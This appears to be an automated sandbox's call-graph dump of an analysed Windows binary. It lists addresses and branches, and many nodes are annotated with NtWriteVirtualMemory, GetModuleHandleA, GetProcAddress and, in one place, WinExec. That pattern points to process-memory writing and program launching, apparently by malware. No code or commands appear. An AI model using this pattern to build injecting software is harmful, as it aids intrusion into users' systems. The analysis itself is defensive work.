26380->26382 26383 2cd0195 26381->26383 26385 2cd0972 26382->26385 26384 2cd01c1 26383->26384 26387 2cd01ed 26384->26387 26386 2cd09b4 26385->26386 26388 2cd09c1 26386->26388 26389 2cd0205 26387->26389 26390 2cc8824 3 API calls 26388->26390 26391 2cc8824 3 API calls 26389->26391 26392 2cd09cd 26390->26392 26393 2cd0211 26391->26393 26394 2cd09ee 26392->26394 26395 2cd023d 26393->26395 26397 2cd09f9 26394->26397 26396 2cd0269 26395->26396 26398 2cd0281 26396->26398 26399 2cd0a3d 26397->26399 26400 2cc8824 3 API calls 26398->26400 26401 2cc8824 3 API calls 26399->26401 26403 2cd028d 26400->26403 26402 2cd0a49 26401->26402 26404 2cd0a6a 26402->26404 26406 2cd02b9 26403->26406 26405 2cd0a75 26404->26405 26407 2cd0a82 26405->26407 26408 2cd02e5 26406->26408 26409 2cd0ab9 26407->26409 26410 2cd02fd 26408->26410 26412 2cc8824 3 API calls 26409->26412 26411 2cc8824 3 API calls 26410->26411 26413 2cd0309 26411->26413 26414 2cd0ac5 26412->26414 26415 2cd031e 26413->26415 26417 2cd0ada 26414->26417 26416 2cd0331 26415->26416 26418 2cd0352 26416->26418 26419 2cd0b0e 26417->26419 26420 2cd035d 26418->26420 26422 2cd0b26 26419->26422 26421 2cd0389 26420->26421 26424 2cd03a1 26421->26424 26423 2cd0b50 26422->26423 26426 2cc8824 3 API calls 26423->26426 26425 2cc8824 3 API calls 26424->26425 26428 2cd03ad 26425->26428 26427 2cd0b69 26426->26427 26430 2cd0b8a 26427->26430 26429 2cd03ce 26428->26429 26431 2cd03d9 26429->26431 26432 2cd0ba2 26430->26432 26433 2cd03e6 26431->26433 26436 2cd0bcc 26432->26436 26434 2cd0405 26433->26434 26435 2cd041d 26434->26435 26437 2cc8824 3 API calls 26435->26437 26438 2cc8824 3 API calls 26436->26438 26439 2cd0429 26437->26439 26440 2cd0be5 26438->26440 26441 2cd0438 26439->26441 26443 2cd0c06 26440->26443 26442 2cd0442 26441->26442 26444 2cd044a 26442->26444 26445 2cd07a6 26442->26445 26447 2cd0c1e 26443->26447 26446 2cd046b 26444->26446 26452 2cd1fb1 26445->26452 26449 2cd0476 26446->26449 26448 2cd0c48 26447->26448 26450 2cc8824 3 API calls 26448->26450 26455 2cd04ad 26449->26455 26451 2cd0c61 26450->26451 26453 2cd0c70 26451->26453 26454 2cd1ff5 26452->26454 26456 2cd0c7f 26453->26456 26457 2cc8824 3 API calls 26454->26457 26458 2cc8824 3 API calls 26455->26458 26462 2cd0ca0 26456->26462 26459 2cd2001 26457->26459 26460 2cd04c6 26458->26460 26461 2cd2022 26459->26461 26464 2cd04f2 26460->26464 26466 2cd202d 26461->26466 26463 2cd0cb8 26462->26463 26465 2cd0ce2 26463->26465 26468 2cd051e 26464->26468 26467 2cd0cef 26465->26467 26469 2cd2071 26466->26469 26471 2cc8824 3 API calls 26467->26471 26470 2cd0536 26468->26470 26472 2cc8824 3 API calls 26469->26472 26473 2cc8824 3 API calls 26470->26473 26474 2cd0cfb 26471->26474 26475 2cd207d 26472->26475 26476 2cd0542 26473->26476 26477 2cd0d1c 26474->26477 26478 2cd209e 26475->26478 26482 2cd056e 26476->26482 26479 2cd0d27 26477->26479 26480 2cd20a9 26478->26480 26481 2cd0d34 26479->26481 26485 2cd20b6 26480->26485 26484 2cd0d5e 26481->26484 26483 2cd059a 26482->26483 26486 2cd05b2 26483->26486 26487 2cc8824 3 API calls 26484->26487 26488 2cd20ed 26485->26488 26489 2cc8824 3 API calls 26486->26489 26490 2cd0d77 26487->26490 26491 2cc8824 3 API calls 26488->26491 26492 2cd05be 26489->26492 26493 2cd0d81 26490->26493 26494 2cd20f9 26491->26494 26496 2cd05ea 26492->26496 26493->26445 26498 2cd0d89 26493->26498 26495 2cd2125 26494->26495 26497 2cd2151 26495->26497 26501 2cd0616 26496->26501 26500 2cd215c 26497->26500 26499 2cd0de1 26498->26499 26503 2cd0df9 26499->26503 26504 2cc8824 3 API calls 26500->26504 26502 2cd062e 26501->26502 26505 2cc8824 3 API calls 26502->26505 26509 2cc8824 3 API calls 26503->26509 26506 2cd2175 26504->26506 26507 2cd063a 26505->26507 26512 2cd219a 26506->26512 26506->27605 26508 2cd065b 26507->26508 26510 2cd0666 26508->26510 26514 2cd0e05 26509->26514 26511 2cd0673 26510->26511 26517 2cd0692 26511->26517 27624 2cb46a4 26512->27624 26516 2cd0e5d 26514->26516 26515 2cd21d3 26519 2cd21f2 26515->26519 26520 2cd0e75 26516->26520 26518 2cd06aa 26517->26518 26521 2cc8824 3 API calls 26518->26521 26523 2cd220a 26519->26523 26524 2cc8824 3 API calls 26520->26524 26522 2cd06b6 26521->26522 26525 2cd06c0 26522->26525 26526 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26523->26526 26530 2cd0e81 26524->26530 26527 2cd06cd 26525->26527 26529 2cd2216 26526->26529 26528 2cd06de 26527->26528 26531 2cd06ee 26528->26531 26533 2cd224f 26529->26533 26535 2cd0ece 26530->26535 26532 2cd074b 26531->26532 26534 2cd0756 26532->26534 26536 2cd2286 26533->26536 26539 2cd0782 26534->26539 26538 2cd0ee6 26535->26538 26537 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26536->26537 26541 2cd2292 26537->26541 26542 2cd0f1d 26538->26542 26540 2cd079a 26539->26540 26543 2cc8824 3 API calls 26540->26543 26547 2cd22cb 26541->26547 26544 2cc8824 3 API calls 26542->26544 26543->26445 26545 2cd0f29 26544->26545 26546 2cd0f55 26545->26546 26548 2cd0f62 26546->26548 26549 2cd2302 26547->26549 26551 2cd0f81 26548->26551 26550 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26549->26550 26552 2cd230e 26550->26552 26554 2cd0f99 26551->26554 26553 2cd232f 26552->26553 26555 2cd233a 26553->26555 26556 2cc8824 3 API calls 26554->26556 26558 2cd2366 26555->26558 26557 2cd0fa5 26556->26557 26559 2cd0fd1 26557->26559 26560 2cd2371 26558->26560 26561 2cd0fde 26559->26561 26562 2cd237e 26560->26562 26564 2cd0ffd 26561->26564 26563 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26562->26563 26565 2cd238a 26563->26565 26567 2cd1015 26564->26567 26566 2cd2394 26565->26566 26570 2cd23a6 26566->26570 26568 2cc8824 3 API calls 26567->26568 26569 2cd1021 26568->26569 26571 2cd1042 26569->26571 26573 2cd23d7 26570->26573 26572 2cd105a 26571->26572 26574 2cd1079 26572->26574 26575 2cd23ef 26573->26575 26576 2cd1091 26574->26576 26577 2cd2426 26575->26577 26578 2cc8824 3 API calls 26576->26578 26579 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26577->26579 26580 2cd109d 26578->26580 26581 2cd2432 26579->26581 26584 2cd10be 26580->26584 26582 2cd2453 26581->26582 26583 2cd245e 26582->26583 26586 2cd246b 26583->26586 26585 2cd1100 26584->26585 26588 2cd110d 26585->26588 26587 2cd2495 26586->26587 26589 2cd24a2 26587->26589 26590 2cc8824 3 API calls 26588->26590 26591 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26589->26591 26592 2cd1119 26590->26592 26593 2cd24ae 26591->26593 26594 2cd112e 26592->26594 26595 2cd24be 26593->26595 26597 2cd1144 26594->26597 26596 2cd24ce 26595->26596 26601 2cd24ef 26596->26601 26598 2cd119c 26597->26598 26599 2cd11a7 26598->26599 26600 2cd11b4 26599->26600 26603 2cc8824 3 API calls 26600->26603 26602 2cd253e 26601->26602 26604 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26602->26604 26605 2cd11c0 26603->26605 26606 2cd254a 26604->26606 26608 2cd11e1 26605->26608 26607 2cd256b 26606->26607 26610 2cd2576 26607->26610 26609 2cd1218 26608->26609 26611 2cd1230 26609->26611 26612 2cd25ba 26610->26612 26613 2cc8824 3 API calls 26611->26613 26614 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26612->26614 26615 2cd123c 26613->26615 26616 2cd25c6 26614->26616 26618 2cd125d 26615->26618 26617 2cd25e7 26616->26617 26621 2cd25f2 26617->26621 26619 2cd1275 26618->26619 26620 2cd129f 26619->26620 26623 2cc8824 3 API calls 26620->26623 26622 2cd2636 26621->26622 26624 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26622->26624 26625 2cd12b8 26623->26625 26626 2cd2642 26624->26626 26842 2cd12c2 26625->26842 26627 2cd2653 26626->26627 26628 2cd2669 26627->26628 26629 2cd267c 26628->26629 26630 2cd269d 26629->26630 26631 2cd26a8 26630->26631 26632 2cd26b5 26631->26632 26634 2cd26d4 26632->26634 26633 2cc8824 3 API calls 26636 2cd133e 26633->26636 26635 2cd26df 26634->26635 26637 2cd26ec 26635->26637 26640 2cd136a 26636->26640 26638 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26637->26638 26639 2cd26f8 26638->26639 26641 2cd2719 26639->26641 26643 2cd13a1 26640->26643 26642 2cd2724 26641->26642 26644 2cd2731 26642->26644 26645 2cd13ae 26643->26645 26649 2cd2750 26644->26649 26646 2cc8824 3 API calls 26645->26646 26647 2cd13ba 26646->26647 26648 2cd13d3 26647->26648 26651 2cd13f4 26648->26651 26650 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26649->26650 26653 2cd2774 26650->26653 26652 2cd142b 26651->26652 26654 2cd1436 26652->26654 26658 2cd27cc 26653->26658 26655 2cd1443 26654->26655 26656 2cc8824 3 API calls 26655->26656 26657 2cd144f 26656->26657 26660 2cd147b 26657->26660 26659 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26658->26659 26662 2cd27f0 26659->26662 26661 2cd1488 26660->26661 26663 2cd14a7 26661->26663 26665 2cd2829 26662->26665 26664 2cd14b2 26663->26664 26666 2cc8824 3 API calls 26664->26666 26669 2cd2860 26665->26669 26667 2cd14cb 26666->26667 27626 2cce2f8 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26667->27626 26671 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26669->26671 26670 2cd14d5 26670->26445 26672 2cd14dd 26670->26672 26691 2cd15ec 26670->26691 26670->26842 26673 2cd286c 26671->26673 26674 2cd14fe 26672->26674 26676 2cd288a 26673->26676 26675 2cd1535 26674->26675 26677 2cd1540 26675->26677 26680 2cd28b7 26676->26680 26678 2cd154d 26677->26678 26679 2cc8824 3 API calls 26678->26679 26681 2cd1559 26679->26681 26684 2cd28e4 26680->26684 26682 2cd1585 26681->26682 26683 2cd1592 26682->26683 26685 2cd15b1 26683->26685 26688 2cd2911 26684->26688 26686 2cd15bc 26685->26686 26687 2cc8824 3 API calls 26686->26687 26840 2cd15d5 26687->26840 26689 2cd2992 26688->26689 26690 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26689->26690 26694 2cd29ab 26690->26694 26692 2cd164f 26691->26692 26693 2cc8824 3 API calls 26692->26693 26697 2cd1668 26693->26697 26695 2cd2a0e 26694->26695 26696 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26695->26696 26700 2cd2a27 26696->26700 26698 2cd16cb 26697->26698 26699 2cc8824 3 API calls 26698->26699 26704 2cd16e4 26699->26704 26701 2cd2a51 26700->26701 26736 2cd2bc5 26700->26736 26703 2cd2a7d 26701->26703 26702 2cd2c13 26706 2cd2c4a 26702->26706 26707 2cd2ab4 26703->26707 26705 2cd1743 26704->26705 26712 2cd175b 26705->26712 26708 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26706->26708 26709 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26707->26709 26711 2cd2c63 26708->26711 26715 2cd2acd 26709->26715 26710 2cc8824 3 API calls 26710->26712 26713 2cd2c84 26711->26713 26712->26710 26714 2cd1793 26712->26714 26717 2cd2cbb 26713->26717 26716 2cd17ca 26714->26716 26719 2cd2b30 26715->26719 26718 2cd17d7 26716->26718 26721 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26717->26721 26720 2cc8824 3 API calls 26718->26720 26722 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26719->26722 26723 2cd17e3 26720->26723 26724 2cd2cdf 26721->26724 26726 2cd2b49 26722->26726 26725 2cd1803 26723->26725 26728 2cd2d33 26724->26728 26727 2cd1824 26725->26727 26731 2cd2bac 26726->26731 26729 2cd183c 26727->26729 26734 2cd2d6a 26728->26734 26730 2cd185b 26729->26730 26733 2cd1866 26730->26733 26732 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26731->26732 26732->26736 26737 2cc8824 3 API calls 26733->26737 26735 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26734->26735 26740 2cd2d8e 26735->26740 26736->26702 26738 2cd187f 26737->26738 26739 2cd18a0 26738->26739 26741 2cd18ab 26739->26741 26743 2cd2dc7 26740->26743 26742 2cd18d7 26741->26742 26744 2cd18e2 26742->26744 26745 2cd2dfe 26743->26745 26747 2cc8824 3 API calls 26744->26747 26746 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26745->26746 26750 2cd2e0a 26746->26750 26748 2cd18fb 26747->26748 26749 2cd1918 26748->26749 26753 2cd193c 26749->26753 26751 2cd2e36 26750->26751 26752 2cd2e6d 26751->26752 26755 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26752->26755 26754 2cd197e 26753->26754 26756 2cd198b 26754->26756 26757 2cd2e86 26755->26757 26758 2cc8824 3 API calls 26756->26758 26761 2cd2ea7 26757->26761 26759 2cd1997 26758->26759 26760 2cd19b8 26759->26760 26763 2cd19c3 26760->26763 26762 2cd2ede 26761->26762 26764 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26762->26764 26765 2cd1a07 26763->26765 26766 2cd2f02 26764->26766 26767 2cc8824 3 API calls 26765->26767 26769 2cd4c6d 26766->26769 26770 2cd2f17 26766->26770 26768 2cd1a13 26767->26768 26771 2cd1a24 26768->26771 26773 2cd4ca4 26769->26773 26775 2cd2f38 26770->26775 26772 2cd1a48 26771->26772 26774 2cd1a53 26772->26774 26776 2cd4cdb 26773->26776 26780 2cd1a8a 26774->26780 26778 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26775->26778 26777 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26776->26777 26779 2cd4cf4 26777->26779 26781 2cd2f93 26778->26781 26784 2cd4d15 26779->26784 26782 2cc8824 3 API calls 26780->26782 26787 2cd2fb4 26781->26787 26783 2cd1aa3 26782->26783 26785 2cd1acf 26783->26785 26786 2cd4d4c 26784->26786 26789 2cd1afb 26785->26789 26788 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26786->26788 26790 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26787->26790 26791 2cd4d70 26788->26791 26794 2cd1b13 26789->26794 26792 2cd300f 26790->26792 26798 2cd4d9c 26791->26798 26797 2cd3030 26792->26797 26793 2cc8824 3 API calls 26793->26794 26794->26793 26795 2cd1b48 26794->26795 26796 2cd1b74 26795->26796 26803 2cd1ba0 26796->26803 26800 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26797->26800 26799 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26798->26799 26801 2cd4dec 26799->26801 26802 2cd308b 26800->26802 26808 2cd4e18 26801->26808 26806 2cd30ac 26802->26806 26804 2cc8824 3 API calls 26803->26804 26805 2cd1bc4 26804->26805 26807 2cd1bf0 26805->26807 26810 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26806->26810 26812 2cd1c1c 26807->26812 26809 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26808->26809 26811 2cd4e68 26809->26811 26813 2cd3107 26810->26813 26822 2cd4e8e 26811->26822 26814 2cd1c34 26812->26814 26818 2cd3128 26813->26818 26815 2cc8824 3 API calls 26814->26815 26816 2cd1c40 26815->26816 26817 2cd1c45 26816->26817 26819 2cd1c66 26817->26819 26820 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26818->26820 26821 2cd1c7e 26819->26821 26825 2cd3183 26820->26825 26824 2cd1ca8 26821->26824 26823 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26822->26823 26834 2cd4f0a 26823->26834 26826 2cd1cb5 26824->26826 26830 2cd31cd 26825->26830 26827 2cc8824 3 API calls 26826->26827 26828 2cd1cc1 26827->26828 26829 2cd1ce2 26828->26829 26831 2cd1ced 26829->26831 26833 2cd3231 26830->26833 26832 2cd1cfa 26831->26832 26838 2cd1d24 26832->26838 26836 2cd3249 26833->26836 26835 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26834->26835 26848 2cd4f86 26835->26848 26837 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26836->26837 26841 2cd3255 26837->26841 26839 2cc8824 3 API calls 26838->26839 26839->26840 26840->26670 26844 2cd32ad 26841->26844 26843 2cd12fb 26842->26843 26847 2cd131a 26843->26847 26845 2cd32c5 26844->26845 26846 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26845->26846 26852 2cd32d1 26846->26852 26847->26633 26850 2cc8824 3 API calls 26847->26850 26849 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26848->26849 26859 2cd502e 26849->26859 26851 2cd1dde 26850->26851 26854 2cd1e0a 26851->26854 26853 2cd3329 26852->26853 26855 2cd3341 26853->26855 26856 2cd1e36 26854->26856 26857 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26855->26857 26858 2cd1e4e 26856->26858 26865 2cd334d 26857->26865 26861 2cc8824 3 API calls 26858->26861 26860 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26859->26860 26870 2cd50aa 26860->26870 26862 2cd1e5a 26861->26862 26863 2cd1e6a 26862->26863 26866 2cd1e7a 26863->26866 26864 2cd335b 26864->26865 26865->26864 26869 2cd3419 26865->26869 26867 2cd1ea6 26866->26867 26868 2cd1ed2 26867->26868 26873 2cd1edd 26868->26873 26871 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26869->26871 26872 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26870->26872 26878 2cd3432 26871->26878 26882 2cd5126 26872->26882 26874 2cd1eea 26873->26874 26875 2cc8824 3 API calls 26874->26875 26876 2cd1ef6 26875->26876 26877 2cd1f17 26876->26877 26879 2cd1f22 26877->26879 26880 2cd3495 26878->26880 26886 2cd1f4e 26879->26886 26881 2cd34a2 26880->26881 26883 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26881->26883 26884 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26882->26884 26885 2cd34ae 26883->26885 26894 2cd51a2 26884->26894 26887 2cc870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26885->26887 26888 2cd1f66 26886->26888 26890 2cd34b3 26887->26890 26889 2cc8824 3 API calls 26888->26889 26889->26670 26891 2cd350b 26890->26891 26892 2cd3516 26891->26892 26893 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26892->26893 26896 2cd352f 26893->26896 26895 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26894->26895 26901 2cd524f 26895->26901 26897 2cd3587 26896->26897 26898 2cd3592 26897->26898 26899 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26898->26899 26900 2cd35ab 26899->26900 26903 2cd35cc 26900->26903 26902 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26901->26902 26907 2cd52cb 26902->26907 26904 2cd360e 26903->26904 26905 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26904->26905 26906 2cd3627 26905->26906 26909 2cd3648 26906->26909 26908 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26907->26908 26912 2cd5347 26908->26912 26910 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26909->26910 26911 2cd36a3 26910->26911 26914 2cd36b2 26911->26914 26913 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26912->26913 26917 2cd53c3 26913->26917 26915 2cd3722 26914->26915 26916 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26915->26916 26919 2cd372e 26916->26919 26918 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26917->26918 26922 2cd543f 26918->26922 26920 2cd379e 26919->26920 26921 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26920->26921 26924 2cd37aa 26921->26924 26923 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26922->26923 26926 2cd54bb 26923->26926 26925 2cd37e3 26924->26925 26927 2cd381a 26925->26927 26930 2cd551b 26926->26930 27445 2cd6743 26926->27445 26928 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26927->26928 26929 2cd3826 26928->26929 26932 2cd3852 26929->26932 26931 2cd553c 26930->26931 26933 2cd5547 26931->26933 26936 2cd386b 26932->26936 26935 2cd5554 26933->26935 26934 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26949 2cd6d34 26934->26949 26937 2cd5573 26935->26937 26938 2cd3876 26936->26938 26939 2cd557e 26937->26939 26940 2cc87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26938->26940 26941 2cd558b 26939->26941 26942 2cd3883 26940->26942 26943 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26941->26943 26944 2cd38a4 26942->26944 26945 2cd5597 26943->26945 26947 2cd38c8 26944->26947 26946 2cd55b8 26945->26946 26948 2cd55c3 26946->26948 26952 2cd38d3 26947->26952 26951 2cd55d0 26948->26951 26950 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26949->26950 26966 2cd6db0 26950->26966 26953 2cd55ef 26951->26953 26954 2cd38d9 26952->26954 26956 2cd55fa 26953->26956 26955 2cc87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26954->26955 26957 2cd38e0 26955->26957 26959 2cd5607 26956->26959 26958 2cc870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26957->26958 26960 2cd38e5 26958->26960 26961 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26959->26961 26962 2cd3906 26960->26962 26963 2cd5613 26961->26963 26965 2cd391e 26962->26965 26964 2cd5634 26963->26964 26971 2cd563f 26964->26971 26968 2cd393d 26965->26968 26967 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26966->26967 26976 2cd6e2c 26967->26976 26969 2cd3948 26968->26969 26970 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26969->26970 26974 2cd3961 26970->26974 26972 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26971->26972 26973 2cd568f 26972->26973 26979 2cd56bb 26973->26979 26975 2cd399a 26974->26975 26978 2cd39b9 26975->26978 26977 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26976->26977 26985 2cd6ea8 26977->26985 26980 2cd39c4 26978->26980 26984 2cd56f3 26979->26984 26981 2cd39d1 26980->26981 26982 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26981->26982 26983 2cd39dd 26982->26983 26987 2cd39fe 26983->26987 26986 2cd572a 26984->26986 26988 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26985->26988 26989 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26986->26989 26990 2cd3a35 26987->26990 26991 2cd6f24 26988->26991 26992 2cd5743 26989->26992 26993 2cd3a40 26990->26993 27006 2cd7a68 26991->27006 27007 2cd6f39 26991->27007 26995 2cd5764 26992->26995 26994 2cd3a4d 26993->26994 26996 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26994->26996 27003 2cd579b 26995->27003 27004 2cd3a59 26996->27004 26997 2cd3a63 26998 2cd3aad 26997->26998 26999 2cd3a67 26997->26999 27000 2cc870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26998->27000 27001 2cd3a78 26999->27001 27002 2cd3ab2 27000->27002 27001->27004 27010 2cd3ad8 27002->27010 27005 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27003->27005 27004->26997 27011 2cd57bf 27005->27011 27008 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27006->27008 27009 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27007->27009 27018 2cd7ae4 27008->27018 27017 2cd6fb5 27009->27017 27012 2cd3aef 27010->27012 27013 2cd57f8 27011->27013 27014 2cd3b1b 27012->27014 27015 2cd582f 27013->27015 27020 2cd3b47 27014->27020 27016 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27015->27016 27025 2cd583b 27016->27025 27019 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27017->27019 27021 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27018->27021 27030 2cd7031 27019->27030 27022 2cd3b5f 27020->27022 27031 2cd7b60 27021->27031 27023 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27022->27023 27024 2cd3b6b 27023->27024 27026 2cd3b97 27024->27026 27027 2cd58ab 27025->27027 27028 2cd3bc3 27026->27028 27029 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27027->27029 27033 2cd3bdb 27028->27033 27039 2cd58b7 27029->27039 27032 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27030->27032 27034 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27031->27034 27037 2cd70ad 27032->27037 27035 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27033->27035 27042 2cd7bdc 27034->27042 27036 2cd3be7 27035->27036 27040 2cd3c13 27036->27040 27038 2cc8410 GetModuleHandleA GetProcAddress WinExec 27037->27038 27052 2cd70d6 27038->27052 27047 2cd5941 27039->27047 27041 2cd3c3f 27040->27041 27044 2cd3c57 27041->27044 27043 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27042->27043 27045 2cd7c58 27043->27045 27046 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27044->27046 27051 2cd7c6d 27045->27051 27066 2cd8af1 27045->27066 27048 2cd3c63 27046->27048 27049 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27047->27049 27050 2cc870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27048->27050 27056 2cd5984 27049->27056 27062 2cd3c68 27050->27062 27055 2cd7c8e 27051->27055 27053 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27052->27053 27071 2cd7152 27053->27071 27054 2cd3c72 27057 2cd3c76 27054->27057 27058 2cd3cd1 27054->27058 27063 2cd7cc5 27055->27063 27060 2cd59bd 27056->27060 27059 2cd3c9c 27057->27059 27061 2cd3cf2 27058->27061 27059->27062 27065 2cd59f4 27060->27065 27064 2cd3d29 27061->27064 27062->27054 27068 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27063->27068 27069 2cd3d34 27064->27069 27070 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27065->27070 27067 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27066->27067 27084 2cd8b6d 27067->27084 27075 2cd7ce9 27068->27075 27073 2cd3d41 27069->27073 27072 2cd5a00 27070->27072 27074 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27071->27074 27078 2cd5a2c 27072->27078 27076 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27073->27076 27091 2cd71ce 27074->27091 27080 2cd7d22 27075->27080 27077 2cd3d4d 27076->27077 27079 2cd3d79 27077->27079 27086 2cd5a63 27078->27086 27081 2cd3d86 27079->27081 27082 2cd7d59 27080->27082 27083 2cd3da5 27081->27083 27085 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27082->27085 27090 2cd3db0 27083->27090 27087 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27084->27087 27088 2cd7d65 27085->27088 27089 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27086->27089 27101 2cd8be9 27087->27101 27097 2cd7d91 27088->27097 27092 2cd5a7c 27089->27092 27094 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27090->27094 27093 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27091->27093 27096 2cd5a9d 27092->27096 27111 2cd724a 27093->27111 27095 2cd3dc9 27094->27095 27098 2cd3dea 27095->27098 27099 2cd5ad4 27096->27099 27100 2cd7dc8 27097->27100 27106 2cd3e21 27098->27106 27105 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27099->27105 27102 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27100->27102 27103 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27101->27103 27104 2cd7de1 27102->27104 27128 2cd8c65 27103->27128 27109 2cd7e0d 27104->27109 27110 2cd5af8 27105->27110 27107 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27106->27107 27108 2cd3e45 27107->27108 27114 2cd3e66 27108->27114 27115 2cd7e30 27109->27115 27113 2cd5b31 27110->27113 27112 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27111->27112 27131 2cd72ed 